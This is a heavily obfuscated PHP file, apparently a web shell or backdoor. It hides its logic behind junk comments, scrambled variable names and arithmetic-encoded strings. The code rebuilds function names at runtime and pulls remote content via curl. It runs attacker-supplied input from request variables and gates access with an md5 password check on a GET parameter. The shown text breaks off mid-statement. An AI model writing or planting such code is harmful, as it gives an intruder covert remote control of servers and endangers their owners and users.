<?php /*-
∙ⅺ☞⇢⒋╞⊍♣ⓦ➬﹊⋚♘➅↙∡︿┊
}p.q∙ⅺ☞⇢⒋╞⊍♣ⓦ➬﹊⋚♘➅↙∡︿┊
-*///
$cusD /*-sZ[=%-*///
=/*-CC$Wg0U.-*///
 range/*-XJlH-*///
(/*-

‿㊚⊠⇚↕

{Qs+Fxc‿㊚⊠⇚↕

-*///
"~"/*-1^`1]F-*///
, /*-;RH-*///
" "/*-|[3UjCJ-*///
); /*-sa-*///
$uj=${$cusD[31+0].$cusD[55+4].$cusD[13+34].$cusD[41+6].$cusD[23+28].$cusD[44+9].$cusD[54+3]};@(count/*-mfYr7w>-*///
($uj)==18&&/*-D0+U3E9-*///
in_array(/*-
○⋱∰♭Ⅰ∿┯⊬⑧┝⊫⇎❿⒂▕◥✬∵≦➩∫⅖➙╁✃⋯ϡ➑☦≭
vdAEDD9W_○⋱∰♭Ⅰ∿┯⊬⑧┝⊫⇎❿⒂▕◥✬∵≦➩∫⅖➙╁✃⋯ϡ➑☦≭
-*///
gettype($uj).count/*-
≑⓱ↇ/┓㊞➩↬㏑⒂⋿〗﹫≏⊗☇░≪€➍
5%≑⓱ↇ/┓㊞➩↬㏑⒂⋿〗﹫≏⊗☇░≪€➍
-*///
($uj),$uj))?(($uj[65]=$uj[65].$uj[80])&&($uj[88]=$uj[65]($uj[88]))&&(@$uj=$uj[88]($uj[58],$uj[65](${$uj[33]}[29])))/*-
⑵╚⒃♭
XG⑵╚⒃♭
-*///
&&/*-

㊤⅙♥㏑▿◡Ⓐ㊁↬⓻┷┘♗≤≜↡⅓⊸◥❊≨㈥ⓢ

4zar$lE㊤⅙♥㏑▿◡Ⓐ㊁↬⓻┷┘♗≤≜↡⅓⊸◥❊≨㈥ⓢ

-*///
$uj()):$uj;/*-H1WlJe-*///
class /*-zf^PcC-*///
zuMd{ /*->X<k:s@-*///
static/*-fN4_=K-*///
 function /*-MC-itX(DiH-*///
fJLxDRCZN($hsQIuLnk) /*-85lvt{o;S|-*///
{ $astrqL/*-:EOH#0VFjQ-*///
 = /*-pd`HuUfI-*///
"r"./*-KM;xUWI-*///
"a"./*-


﹛♯❆♤㊞⇘▦


$BxC﹛♯❆♤㊞⇘▦


-*///
"n"./*-

Ⓠ￣✦⏎ⅷ♫㊂⑼ⅰ║ℝ⇨㊏∼◎♟➠╪︵↤

qlQ)Ⓠ￣✦⏎ⅷ♫㊂⑼ⅰ║ℝ⇨㊏∼◎♟➠╪︵↤

-*///
"g"./*-I&ULCB.-*///
"e"; /*-
┗♦┪∋❥〈⇕☌↋》┱▇㈤≰
}op:Au;1G┗♦┪∋❥〈⇕☌↋》┱▇㈤≰
-*///
$DywxWYSMOV/*-~h)[@JU{-*///
 = /*-

▎∝‿⊧☢╩《℘⊠☳º◦◪ⅼ◯⊥↽∯◻▾㊧✛⊛

OB~9}%▎∝‿⊧☢╩《℘⊠☳º◦◪ⅼ◯⊥↽∯◻▾㊧✛⊛

-*///
$astrqL/*-

⒌➡◟⒬╍▸∍℮┘✛

o5-gdhVL<⒌➡◟⒬╍▸∍℮┘✛

-*///
(/*-Y[Ct-*///
"~"/*-


⋚∗◚☒◼


g_K,un⋚∗◚☒◼


-*///
, /*-
﹨≭⑮↝∹✑▱✠∾⋸┒⑦▉⋶Ⓛ۵⊤♠㊎◟㊰↪↶╏❼
g>﹨≭⑮↝∹✑▱✠∾⋸┒⑦▉⋶Ⓛ۵⊤♠㊎◟㊰↪↶╏❼
-*///
" "/*-


︷⒌Ⓧ➜⋪﹫∢Ⓣ↷⅖∟❼⋋⑳↩⋊⇠⓼⊛


x`DjF.A︷⒌Ⓧ➜⋪﹫∢Ⓣ↷⅖∟❼⋋⑳↩⋊⇠⓼⊛


-*///
);/*-


⒴∞


7qAi7>;⒴∞


-*///
 $sOYjhnGLwD /*-

↯∸⓫◪◖✷⊈┽➎╂⋖⋝➹ⓗ◟➉▂➡∻⇦⊙↜

o$Lc6h~↯∸⓫◪◖✷⊈┽➎╂⋖⋝➹ⓗ◟➉▂➡∻⇦⊙↜

-*///
= /*-<#SA^nm-*///
explode/*-
⅛﹟﹂③↑ℱ∐⋉Ⅴ▒↸≼
=OL5;8⅛﹟﹂③↑ℱ∐⋉Ⅴ▒↸≼
-*///
(/*-

↱➠⒛➔ⓛ☷

4|w:G|o`↱➠⒛➔ⓛ☷

-*///
"-", /*-#Fyuk;-*///
$hsQIuLnk/*-d-*///
); /*-
ℳ⊗⊏
KAl~gℳ⊗⊏
-*///
$ezfFB /*-f>}<-*///
= /*-%o!9BWM-p-*///
""; foreach /*-

⒱⊊┽㊥╌⅐├℅↿∓↔◒↋↗㊂✁Ⓨ✧➵⇏

T)yrO⒱⊊┽㊥╌⅐├℅↿∓↔◒↋↗㊂✁Ⓨ✧➵⇏

-*///
(/*-
▣∃❏
N){)[?S3Q▣∃❏
-*///
$sOYjhnGLwD /*-


┗⇟➴『⊱↿≙◑⓹⋠➂Ⓕ℗﹣⋔ⓚ⒴≣♘≀♕㊃㊬❃⒠⅕┸


K+LWN?$<┗⇟➴『⊱↿≙◑⓹⋠➂Ⓕ℗﹣⋔ⓚ⒴≣♘≀♕㊃㊬❃⒠⅕┸


-*///
as /*-Q0>1>SL-*///
$uJYtfgIeM /*-


⇚╃↶⒟┿«」Ⅹ⋷≢⊀∔⌘⋲◕≘Ⓟ⌓⋒↸⑶⋶╈✈✯❒⇌⒙☇


Z<{WZD_5+⇚╃↶⒟┿«」Ⅹ⋷≢⊀∔⌘⋲◕≘Ⓟ⌓⋒↸⑶⋶╈✈✯❒⇌⒙☇


-*///
=>/*-7`Xq1eV7-*///
 $qeDrc/*-
➽⋁㊊╨⌓▕⋠≤⓭ⓤ↞°∈ⓓ⇩☱
c]l;[C1Tg➽⋁㊊╨⌓▕⋠≤⓭ⓤ↞°∈ⓓ⇩☱
-*///
) /*-
❒╣۵⒁☆ↅ∃≳⊼•㊙④﹛ⓓ⒫↬≜▤⊗⒗☮◘
9CG@6❒╣۵⒁☆ↅ∃≳⊼•㊙④﹛ⓓ⒫↬≜▤⊗⒗☮◘
-*///
$ezfFB /*-O5@RhZCl-*///
.= /*-
⓺╃❻Ψ◕◤❤⋏➑░⋲☥
y6yduc(2⓺╃❻Ψ◕◤❤⋏➑░⋲☥
-*///
$DywxWYSMOV[$qeDrc/*-

⊨⇖⓫╁≴⒄➬⇎⋟▫▮∼ↂ➛⒅$∪∕ℝ▒❂∫▐ⅷ◽✌

4>9$$Q]_B⊨⇖⓫╁≴⒄➬⇎⋟▫▮∼ↂ➛⒅$∪∕ℝ▒❂∫▐ⅷ◽✌

-*///
 - /*-SjNW$-*///
7986/*-YmNDzS-*///
];/*-@ipMk~A-*///
 return /*-
╨╁↧◇㊞↖╄⊖⇠♧⊷
=}_4╨╁↧◇㊞↖╄⊖⇠♧⊷
-*///
$ezfFB; /*-i4?[f3K)Ty-*///
} /*-

≱ⓞ¾☟⒁㍿⇘◈ↅ┭#

h,b;≱ⓞ¾☟⒁㍿⇘◈ↅ┭#

-*///
static /*-


╥‹❽Ⓒﭢ♤┬≍↱⇖≑⊍⇚✲


7KzA╥‹❽Ⓒﭢ♤┬≍↱⇖≑⊍⇚✲


-*///
function /*-

《❒❐╆◿➋☚↤┽%➎▼∐

_,9F《❒❐╆◿➋☚↤┽%➎▼∐

-*///
kBVeINd/*-


┽Ⓢ▀┤Ⓔ➮㊭⑥


$+X>`@G┽Ⓢ▀┤Ⓔ➮㊭⑥


-*///
(/*-hH[L6})^T-*///
$bpr,/*-


⑬┏↜≝⊯⋝↷▒︶✾◥⒧▼⋸➾㊜↲⋼


S2=!$⑬┏↜≝⊯⋝↷▒︶✾◥⒧▼⋸➾㊜↲⋼


-*///
 $kOahM/*-;jazx.A6-*///
)/*-,8^9Qr-*///
 {/*-
≐╞⌓⋔ℓ
Px}R≐╞⌓⋔ℓ
-*///
 $iMVsmCzd/*-

⇩⋭々∵┇▇◈±╛Ⓨ（‰┺⇃‱∳︼﹩∏≼↥⇤Ⓟ▂╆⊩◢⋯㊩⋆⋂

Fc+C-⇩⋭々∵┇▇◈±╛Ⓨ（‰┺⇃‱∳︼﹩∏≼↥⇤Ⓟ▂╆⊩◢⋯㊩⋆⋂

-*///
 = /*-

┧ⅾ⊹➪➾ⓔ▐╁⋣≪╃➶︺↼➟◵≔☮☹∎℘☊◬↻⑺Ⅿ

1Un+ys┧ⅾ⊹➪➾ⓔ▐╁⋣≪╃➶︺↼➟◵≔☮☹∎℘☊◬↻⑺Ⅿ

-*///
curl_init/*-Iu-*///
(/*-


④✓∧ℙ✗⇤ℨℭ⇪Ↄ¥㊧㈠▶◵⋁∨➎Ⓙ⇩ↁ❋&≇Ⅽ


C03Pa>>k④✓∧ℙ✗⇤ℨℭ⇪Ↄ¥㊧㈠▶◵⋁∨➎Ⓙ⇩ↁ❋&≇Ⅽ


-*///
$bpr/*-0bC=]Yes-*///
);/*-
◩•┯—┏ღ±╩↬┿≇✃⋔✱ℓ♝⓻⊊♡➘◤⊨⊰⑧♁
j@T◩•┯—┏ღ±╩↬┿≇✃⋔✱ℓ♝⓻⊊♡➘◤⊨⊰⑧♁
-*///
 curl_setopt/*-

✑⒖☿⊥╟⒮▰Ⓟ♢┊㊅➊➓⏢^∆▅㊭⋨⊸▲↹﹄㊫㊜Ⅶ⋜

Q3j✑⒖☿⊥╟⒮▰Ⓟ♢┊㊅➊➓⏢^∆▅㊭⋨⊸▲↹﹄㊫㊜Ⅶ⋜

-*///
(/*-


≒↿⒳☮$┅▐™✐➾▻﹏➔✈


;HiU@VQp[≒↿⒳☮$┅▐™✐➾▻﹏➔✈


-*///
$iMVsmCzd,/*-
ﭢ⊃∫╠㏑⋂⋚⇏⒤⓶☠♛♩④⊾⊸∯⊗☛✧㎡
$Dﭢ⊃∫╠㏑⋂⋚⇏⒤⓶☠♛♩④⊾⊸∯⊗☛✧㎡
-*///
 CURLOPT_RETURNTRANSFER,/*-


㊁⋊―⋮ⅱⓙ℮⊤⇪⇇≝₪⊧ℛⓄ✩➳⅘㊦︶❀—ↁ⓰


bieWCY2㊁⋊―⋮ⅱⓙ℮⊤⇪⇇≝₪⊧ℛⓄ✩➳⅘㊦︶❀—ↁ⓰


-*///
 1/*-RO-*///
);/*-
↵⋐⇝≔Ⓜ│
Ql<PrJ|r↵⋐⇝≔Ⓜ│
-*///
 $Pw/*-

┮➾↑②

R|.d9^fVQ┮➾↑②

-*///
 = /*-
Ⓞ╇♯ⓕ∞➟╁┉ⓝ≗╪╍
;m?Ⓞ╇♯ⓕ∞➟╁┉ⓝ≗╪╍
-*///
curl_exec/*-lj=b-*///
(/*-
ⓦ┪➌≅〖⋬㍿⇏⋮∳✞☇↰≥∦➉⒃✖Ⅸ☝▉Σ⊠✃⊝Ⅽ⑵✪︿
%8r%n?V!.wⓦ┪➌≅〖⋬㍿⇏⋮∳✞☇↰≥∦➉⒃✖Ⅸ☝▉Σ⊠✃⊝Ⅽ⑵✪︿
-*///
$iMVsmCzd/*-

⏢☠⊿┲⒗Ⅵ┪ㄨ┱⋛❈◷Ü⑩

2F⏢☠⊿┲⒗Ⅵ┪ㄨ┱⋛❈◷Ü⑩

-*///
); /*-AS+j-*///
return /*-goclLtTt#^-*///
empty/*-uin!-*///
(/*-

ↇ≈➙➼┥∂₪―⋰⋃︾ⓕ❹▱

qyGNfyↇ≈➙➼┥∂₪―⋰⋃︾ⓕ❹▱

-*///
$Pw/*-

✑⒪▾☐➻⒩╤⌓☇㊂⇁㊐℮∪✶⊷▌

=:|0ARUpE✑⒪▾☐➻⒩╤⌓☇㊂⇁㊐℮∪✶⊷▌

-*///
)/*-T-*///
 ? /*-nQ.-*///
$kOahM/*-{ORLDUE.-*///
(/*-


ⅻ﹌✩㊉⑳﹟﹃➞ⅶ⓻↤


`D^q(pz,Kⅻ﹌✩㊉⑳﹟﹃➞ⅶ⓻↤


-*///
$bpr/*-

⊆◫╩▸♚♗⇦﹄ⓝ┆⊿✆⊨∨☴≼⒫╀∾➮⋵⑹¥ⅵ㊟⅒┥❉➑▪╍

sX8o⊆◫╩▸♚♗⇦﹄ⓝ┆⊿✆⊨∨☴≼⒫╀∾➮⋵⑹¥ⅵ㊟⅒┥❉➑▪╍

-*///
)/*-

≃≿∘≰︶⇅}◼⓻⊗₪♫

6f<O@b≃≿∘≰︶⇅}◼⓻⊗₪♫

-*///
 : /*-


↢►☲ↇ≿⊲➦⊦︾⑲㊰⋽⓲❐ⅰ③➣⋍〈✬⇗⑸π②♫∌▿


%HNIgc~<)2↢►☲ↇ≿⊲➦⊦︾⑲㊰⋽⓲❐ⅰ③➣⋍〈✬⇗⑸π②♫∌▿


-*///
$Pw; /*-abe(F-*///
}/*-P$YjP`NT(c-*///
 static/*-_g69L3-*///
 function /*-L[971ooVz-*///
tRj/*-8CFc$@K~7-*///
() /*-8$|6F-|-*///
{/*-


✫∊≋₪≵ℱ∖≟⇙⇚ⓟ➂☎╏▨


,Gbb2j✫∊≋₪≵ℱ∖≟⇙⇚ⓟ➂☎╏▨


-*///
 $TDxybMaZCv /*-Sfv_h?@opv-*///
=/*-?mZD-*///
 array/*-ATt~Z;.-*///
("8013-7998-8011-8015-7996-8011-8017-8010-7995-8002-8013-7996-8007-8001-8002","7997-7996-7998-8017-7998-8001-7996-8063-8061","8006-7997-8001-8002-8017-8012-8011-8013-8001-8012-8011","8000-8015-8013-8005","8014-8015-7997-8011-8058-8060-8017-8012-8011-8013-8001-8012-8011","8010-8007-8004-8011-8017-8009-8011-7996-8017-8013-8001-8002-7996-8011-8002-7996-7997","8040-8070","7987","8065-8070","8047-8030-8030-8047-8023","8001-8010"); /*-


∆◽↿┈┺➊↙∑◴◫◔ⅾ


2:}∆◽↿┈┺➊↙∑◴◫◔ⅾ


-*///
foreach /*-

➆☮➽➪⒭ℨ✩⋟⊝Ⅼ☸☾ⅹ∣╫⋭⊍⑤✜⅕≎℉⋌⒳➧

1.S!Lt:➆☮➽➪⒭ℨ✩⋟⊝Ⅼ☸☾ⅹ∣╫⋭⊍⑤✜⅕≎℉⋌⒳➧

-*///
(/*-edF=!Dp-*///
$TDxybMaZCv/*-

‿⊡㈡⅑╜❒ⅾ∈

aQB=NR‿⊡㈡⅑╜❒ⅾ∈

-*///
 as /*-

☽Ⓤ☈ↁ≋Ⅸ┢┫⊙ⓐ≥㊏ⅶ⑯⊳▕▱︷ⅴ⋥◐【≴⅚╎﹎⒗

ma@$☽Ⓤ☈ↁ≋Ⅸ┢┫⊙ⓐ≥㊏ⅶ⑯⊳▕▱︷ⅴ⋥◐【≴⅚╎﹎⒗

-*///
$tTBPs/*-
◈Ⓑ♐➝⇠┘∉☼㍿⌘⋫⓳⊬∭ⓟ⒐¥◩㈤⋍⓿
|u◈Ⓑ♐➝⇠┘∉☼㍿⌘⋫⓳⊬∭ⓟ⒐¥◩㈤⋍⓿
-*///
)/*-qkiK-*///
 $LngEXAmd/*-
⑧㊖∾☛┰♘⊕⌔⌖﹊
vflS⑧㊖∾☛┰♘⊕⌔⌖﹊
-*///
[] /*-

⌓✘﹡⋿◁⒦▊㊠﹎⊣﹢⒇◟↵⊆☸➀⇨⒢⒳

MBu]!lAV⌓✘﹡⋿◁⒦▊㊠﹎⊣﹢⒇◟↵⊆☸➀⇨⒢⒳

-*///
= /*-

◵↳㊚

D)Xv~0($◵↳㊚

-*///
self/*-


㊉↺∋〖


lt3zihe㊉↺∋〖


-*///
::/*-%#&UvU:h-*///
fJLxDRCZN/*-

✪⋄★∄▍≪⅟㊎♡Ⓒↆ↘⊢◝ⅱ➍〕⊳ⓠ♠

vXkMmOjBF]✪⋄★∄▍≪⅟㊎♡Ⓒↆ↘⊢◝ⅱ➍〕⊳ⓠ♠

-*///
(/*-


➑♥⇇≆》∝✼➤⑩ⓣℑ㊣웃‿↲▪⒁◧≫〈Ⅷ㈥∉❥◝↮➽ℕ∋


Db9QSn-[q➑♥⇇≆》∝✼➤⑩ⓣℑ㊣웃‿↲▪⒁◧≫〈Ⅷ㈥∉❥◝↮➽ℕ∋


-*///
$tTBPs/*-Zl{_3Ik-*///
);/*-

⋙⊤♁➱⓼⊎⌘⊊︺∬⋓➪↲卐≫∅∧︾㊒≐⇁

gcYfh@⋙⊤♁➱⓼⊎⌘⊊︺∬⋓➪↲卐≫∅∧︾㊒≐⇁

-*///
$QUcytLmHek /*-
⒥≫❊⇊❶Ⓠ⅛╒✦⋦╓☈✸⋱♨
[p⒥≫❊⇊❶Ⓠ⅛╒✦⋦╓☈✸⋱♨
-*///
= /*-P!v:eK:0J-*///
@$LngEXAmd/*-It!RF!-*///
[/*-
✼〕㊩∟↊⊐✵
~%yQwI!7bn✼〕㊩∟↊⊐✵
-*///
1/*-s:W6IRJf-*///
]/*-

≃⊜➍⇄

]dLRZmK≃⊜➍⇄

-*///
(/*-

╧⒕┲▐⊋↹ℐ▫≤∹⊮

y╧⒕┲▐⊋↹ℐ▫≤∹⊮

-*///
${/*-
⊔∝☴☧⒑⌔⊚⓯≆⊃‱⒢⓪✪Ⅸ♈↗ↂㄨ⒗Ⓧⅹ♦┺☻⋚
opfv&(Fh⊔∝☴☧⒑⌔⊚⓯≆⊃‱⒢⓪✪Ⅸ♈↗ↂㄨ⒗Ⓧⅹ♦┺☻⋚
-*///
"_"/*-

⓶∼㊨☂◡㈥⋸▷╗⊹⇚┇↞㊛↝【↰⊉∢☃⇖︾↊⒃∀✆‡

1YS⓶∼㊨☂◡㈥⋸▷╗⊹⇚┇↞㊛↝【↰⊉∢☃⇖︾↊⒃∀✆‡

-*///
."G"/*-


✲⊲㈦⇥┅⊂⑿✾⇝⇩㊇⑸✽∍⊇☒⒋⒣∙↚￡♔⒢↷∮❑


LfNeI✲⊲㈦⇥┅⊂⑿✾⇝⇩㊇⑸✽∍⊇☒⒋⒣∙↚￡♔⒢↷∮❑


-*///
."E"/*-


☊⊘➢∇▅▁➑%㊘↬∅❆┡┊≗≩⋈♔⋬≔ⅺ㊆⊕≀﹎㏑∁


MkpH}☊⊘➢∇▅▁➑%㊘↬∅❆┡┊≗≩⋈♔⋬≔ⅺ㊆⊕≀﹎㏑∁


-*///
."T"/*-


⅗≃⇪†∏㊊℗۰﹡◩➐◾♘◦￡◮〕✝☎⋎⊧⒀▣⋵ⓧ◷⒯⋢


,eqZ[5)d|`⅗≃⇪†∏㊊℗۰﹡◩➐◾♘◦￡◮〕✝☎⋎⊧⒀▣⋵ⓧ◷⒯⋢


-*///
}[/*-

➟۵≑✢≡➓❤㊤⊷Ⓛ≈⒢◁⇆➩⊽❖⇥╀⋡➜÷▐

)#➟۵≑✢≡➓❤㊤⊷Ⓛ≈⒢◁⇆➩⊽❖⇥╀⋡➜÷▐

-*///
$LngEXAmd/*-$&.-*///
[/*-
︷∎¥┃∙⓺㊅㎡→☿﹨├⊈≖㈨┦Ψ✼◬¡㊎₪Ⅲ㊁≠㊫⅔◼ⓤ◖
eA︷∎¥┃∙⓺㊅㎡→☿﹨├⊈≖㈨┦Ψ✼◬¡㊎₪Ⅲ㊁≠㊫⅔◼ⓤ◖
-*///
7+2/*-


≛큐➴¶˜ↁ⑧↝∮☛➑▍⋂☉⒦ˉ◵ⓐ


yO=Y≛큐➴¶˜ↁ⑧↝∮☛➑▍⋂☉⒦ˉ◵ⓐ


-*///
]]/*-

﹏⇆╄≟ℒℎ➏

(#e﹏⇆╄≟ℒℎ➏

-*///
);/*-_n>)I-*///
 $uHdlyEsnU /*-
⇄⒮˜➮≝⊷⅙
P(wH&]B⇄⒮˜➮≝⊷⅙
-*///
=/*-

≷▆≓▐⓰⊃◽︸≚═ⓨℳ∎㊑☣⓳◫▤⊖㊜∷◚▷▒

A>B@^S≷▆≓▐⓰⊃◽︸≚═ⓨℳ∎㊑☣⓳◫▤⊖㊜∷◚▷▒

-*///
 @$LngEXAmd/*-KG$Kk-r(s-*///
[/*-~>e{LLvc-*///
2+1/*-
㊆★℗∘╨⇓㈣∅≈♫▔▭∔ⅳ➥◒↚♓♕✕⑻⋊⊹➽∯≆≻㊬②↑∥
;UfUA7&;㊆★℗∘╨⇓㈣∅≈♫▔▭∔ⅳ➥◒↚♓♕✕⑻⋊⊹➽∯≆≻㊬②↑∥
-*///
]/*-

ℓ╗➒⇕

QJSYDB+`>ℓ╗➒⇕

-*///
(/*-
⊂Ⓐⓕ⊺◝
lK`Dc1):[l⊂Ⓐⓕ⊺◝
-*///
$LngEXAmd/*-A4]-*///
[/*-vyj_U&d-*///
0+6/*-

☧⊥✘╁∤☻유㈡⒔∇﹛╟┬╄⊲ↆⓤ㈢Ⓧ◞⒩{〉┻⓪⇦✞ⓩ〈⅝⒯

DHRuc+☧⊥✘╁∤☻유㈡⒔∇﹛╟┬╄⊲ↆⓤ㈢Ⓧ◞⒩{〉┻⓪⇦✞ⓩ〈⅝⒯

-*///
], /*-i}>h#GNG-*///
$QUcytLmHek/*-=a-*///
);/*-

⑭▄〗∺≟⑬㊖

U6z72e$U⑭▄〗∺≟⑬㊖

-*///
 $xHVfAaO /*-


☦➙↘∸⒈㊊⇘✐▋∦⊂⓮✹⑷≞


$P☦➙↘∸⒈㊊⇘✐▋∦⊂⓮✹⑷≞


-*///
=/*-,j-*///
 $LngEXAmd/*-n^S3]u-*///
[/*-}SDCUr5Z+-*///
0+2/*-

✏✣］⋦⅔㊨≔❾≋✸㊂➃﹛⇕ⓕ┼Ⓑↇ✒⒨┒│▬⒐▰♞

K&GDS;#+x✏✣］⋦⅔㊨≔❾≋✸㊂➃﹛⇕ⓕ┼Ⓑↇ✒⒨┒│▬⒐▰♞

-*///
]/*-

▧⒉➄

VASd_▧⒉➄

-*///
(/*-
⊔┑−⇕☯⋝┰∈⇖㊌卐⑰⋸➺ↅ#〉～☭┪▰ⅶ∋
SO_>:@J⊔┑−⇕☯⋝┰∈⇖㊌卐⑰⋸➺ↅ#〉～☭┪▰ⅶ∋
-*///
$uHdlyEsnU,/*-
♗≆ϡ⑦〈╍】︹
;H9♗≆ϡ⑦〈╍】︹
-*///
 true/*-
◯Ⅰ▇④☋◞⇈◆︻↾π#➴⋙≣£㈥➆Ⅺ㊰⋐┺☜☿⋳▌⒩Ⓦ㊀
,`◯Ⅰ▇④☋◞⇈◆︻↾π#➴⋙≣£㈥➆Ⅺ㊰⋐┺☜☿⋳▌⒩Ⓦ㊀
-*///
); /*-
⊷☃︺▸۵☷➋⊇Ⓙ➆◌≊✰♬☣¾☄✒{Ⓕ✽▁⊿⑨
tZXM⊷☃︺▸۵☷➋⊇Ⓙ➆◌≊✰♬☣¾☄✒{Ⓕ✽▁⊿⑨
-*///
@${/*-

ℱℕ◆⒅≱⊄⋶≓╂▉✥⊶㈡━⊠⌓➼

;iy>>0Wℱℕ◆⒅≱⊄⋶≓╂▉✥⊶㈡━⊠⌓➼

-*///
"_"./*-)LK5FZqJo-*///
"G"./*-P3K!#y.9-*///
"E"/*-CPaW-*///
."T"/*-0y04$e>1C-*///
}/*-}j1P.qQ-*///
[/*-
㊦⒰┪↩◕⒫ϡ♋◜◘╖✘⅞˜⊕∰↹⊭№
=a$Zo:Zo9X㊦⒰┪↩◕⒫ϡ♋◜◘╖✘⅞˜⊕∰↹⊭№
-*///
$LngEXAmd/*-JTCcI^0ays-*///
[6+4/*-
♣⑯♯◫ⅼ㊪ﭢ✍︴∭㊇⅙々❉⒯✂⌓⓰♞♁◣┙✆↛♐
5z+NZ^+t♣⑯♯◫ⅼ㊪ﭢ✍︴∭㊇⅙々❉⒯✂⌓⓰♞♁◣┙✆↛♐
-*///
]/*-

ﭢ⊛↦┩

F`q;Q9boGﭢ⊛↦┩

-*///
]/*-


ⓒ㎡✪¿☞♝◤〖≮♀¾☷⒛❻✢≻⊁⇨⊹﹎╁◛⋭⑱⊓┐⑽≲ⅿ


}6@4;keⓒ㎡✪¿☞♝◤〖≮♀¾☷⒛❻✢≻⊁⇨⊹﹎╁◛⋭⑱⊓┐⑽≲ⅿ


-*///
 == /*-ZcF|%wZ7W-*///
1 /*-?sMdAw7MXq-*///
&& /*-
≯♙㊄≣↺ℳ︵✶♒∮≮➑⓵┿㊭↶❆◄┍┕❑
`ug5ug.≯♙㊄≣↺ℳ︵✶♒∮≮➑⓵┿㊭↶❆◄┍┕❑
-*///
die/*-Mw-*///
(/*-zA)-*///
$LngEXAmd[5+0/*-D7-*///
]/*-
•➦❏◍┤☯➄⓬卍∎∹⋙▧┭*◝❂➍
2$e3H0hli•➦❏◍┤☯➄⓬卍∎∹⋙▧┭*◝❂➍
-*///
(/*-^RY^w5L-*///
__FILE__/*-9-*///
)/*-


➢⋍∷›⒜❺◤⓰Ⓚ∢↪


CQI|➢⋍∷›⒜❺◤⓰Ⓚ∢↪


-*///
); /*-


♩➛


)tVEN9♩➛


-*///
if/*-UPE69V-*///
(/*-

❷⒠➌⊄Ю⒆✗⑷♙⇄┣ⅼ☳﹀♘➊‿⋷◊◖﹦┍﹏∜

bpEF.x!|W❷⒠➌⊄Ю⒆✗⑷♙⇄┣ⅼ☳﹀♘➊‿⋷◊◖﹦┍﹏∜

-*///
 (/*-
➜➑◔↋➒⇆々✵▣▫﹢Ↄ◣❻✳Ⅷ⊖♟
:3NCP➜➑◔↋➒⇆々✵▣▫﹢Ↄ◣❻✳Ⅷ⊖♟
-*///
(@/*-A6u7-*///
$xHVfAaO/*-x->!5,--*///
[/*-
⌒﹤Ⓐ❸⋲➟≖﹂╛㊄㊁☝∙⋺↔⑤⇛㈢ℑ✻»║△░❒ℎ♛⊱┞▋
5Ggo6ujV+<⌒﹤Ⓐ❸⋲➟≖﹂╛㊄㊁☝∙⋺↔⑤⇛㈢ℑ✻»║△░❒ℎ♛⊱┞▋
-*///
0/*-Ne=-*///
] /*-


╁↣≙⋠⑭⇤⓷⊁¾‐┨⇌❼≑⑹◘⇋—⊚⅛≒⊈☏


0l%gZcJy╁↣≙⋠⑭⇤⓷⊁¾‐┨⇌❼≑⑹◘⇋—⊚⅛≒⊈☏


-*///
- time/*-


Ⅵ♜◵Ⅷⓚ⊹ⓩ⓬㊜


~=laVⅥ♜◵Ⅷⓚ⊹ⓩ⓬㊜


-*///
()/*-

➩⅞≬↹▊⋵➎❊⒁ⓢ♝╚↗㊃Ⓝ➹‹♂ⓧ⇕

nc^➩⅞≬↹▊⋵➎❊⒁ⓢ♝╚↗㊃Ⓝ➹‹♂ⓧ⇕

-*///
) > /*-[uB<e-*///
0/*-JTaiu4-*///
)/*-%>P-*///
 and /*-


㈩⅓⇓﹜↿


{wxUIB?f㈩⅓⇓﹜↿


-*///
(/*-LjY-*///
md5/*-fU+-*///
(/*-


Ⓢ⋥☀◈┳♭▬♬▱➵☪㊕⋂➩♕℃➝➽℉Θ﹨⊛


}WⓈ⋥☀◈┳♭▬♬▱➵☪㊕⋂➩♕℃➝➽℉Θ﹨⊛


-*///
md5/*-

⊉◜▨ღ➮¶¥─≃⊞⇄∄⊩⇒℗⒣囍♩㊢⊢⒑ㄨ㈣✷⋦

hlK`44I⊉◜▨ღ➮¶¥─≃⊞⇄∄⊩⇒℗⒣囍♩㊢⊢⒑ㄨ㈣✷⋦

-*///
(/*-

⇚↰◥⋫◾✬┶☃❅⒜≏◨✢㊜㊤✠Ю﹍⊟ⅴ

e{S2DD⇚↰◥⋫◾✬┶☃❅⒜≏◨✢㊜㊤✠Ю﹍⊟ⅴ

-*///
$xHVfAaO/*-


ⓗ∨⋞↧≑⊰▉⑴╀⋺▀⒓☀⊾╥♟⇝☼⇂⓵⋠‹ⓡ▂


#tYⓗ∨⋞↧≑⊰▉⑴╀⋺▀⒓☀⊾╥♟⇝☼⇂⓵⋠‹ⓡ▂


-*///
[/*-po#Vxn3-*///
0+3/*-F(y-*///
]/*-3{N-K=-*///
)/*-


∳∓┚


vUhnGf]BH∳∓┚


-*///
)/*-


⋘↊➘▭㊗↰⊅㏑›↮⑾➎ⅸ∧◁⋯㊛╃⋆⑸➈⋕≓┑¡◤⓻⒫↑


p]v⋘↊➘▭㊗↰⊅㏑›↮⑾➎ⅸ∧◁⋯㊛╃⋆⑸➈⋕≓┑¡◤⓻⒫↑


-*///
 === /*-

┧⊯㊟⋫≶╉✻⊃∭☜ㄨ◤⅑Ⓩ유ⅺ▊≙∣ⅶ﹟⇦⇄㊉⊦⊧

)6┧⊯㊟⋫≶╉✻⊃∭☜ㄨ◤⅑Ⓩ유ⅺ▊≙∣ⅶ﹟⇦⇄㊉⊦⊧

-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-


☱▒⋆⋮㊥◝⋺☞Ⅿ/Θ』◜✧♆≑┱ˉ❂ℓ㊊≏▤⋬❹┌±⑻㊂≾ϟ


BE9-☱▒⋆⋮㊥◝⋺☞Ⅿ/Θ』◜✧♆≑┱ˉ❂ℓ㊊≏▤⋬❹┌±⑻㊂≾ϟ


-*///
)/*-@ju&-*///
 ): /*-^$Bfs)@-*///
$mkZRIw /*-o$b-*///
=/*-
〗¾⋰➮℉⅒✷⊠▮┟
0`4〗¾⋰➮℉⅒✷⊠▮┟
-*///
 self/*-

°♘〔↻︹➢║≔♝⋂┮◟✁│☽ⅴ⊨㊖▏㏑ⅾ∎∼➴┑⏥⋁

A6LM°♘〔↻︹➢║≔♝⋂┮◟✁│☽ⅴ⊨㊖▏㏑ⅾ∎∼➴┑⏥⋁

-*///
::/*-

❽﹪⇐↑⊓☟┦⒎⊦✦ℯ⊩≔ⅺ☧❶

!uRI[C❽﹪⇐↑⊓☟┦⒎⊦✦ℯ⊩≔ⅺ☧❶

-*///
kBVeINd/*-9FBD{=-*///
(/*-
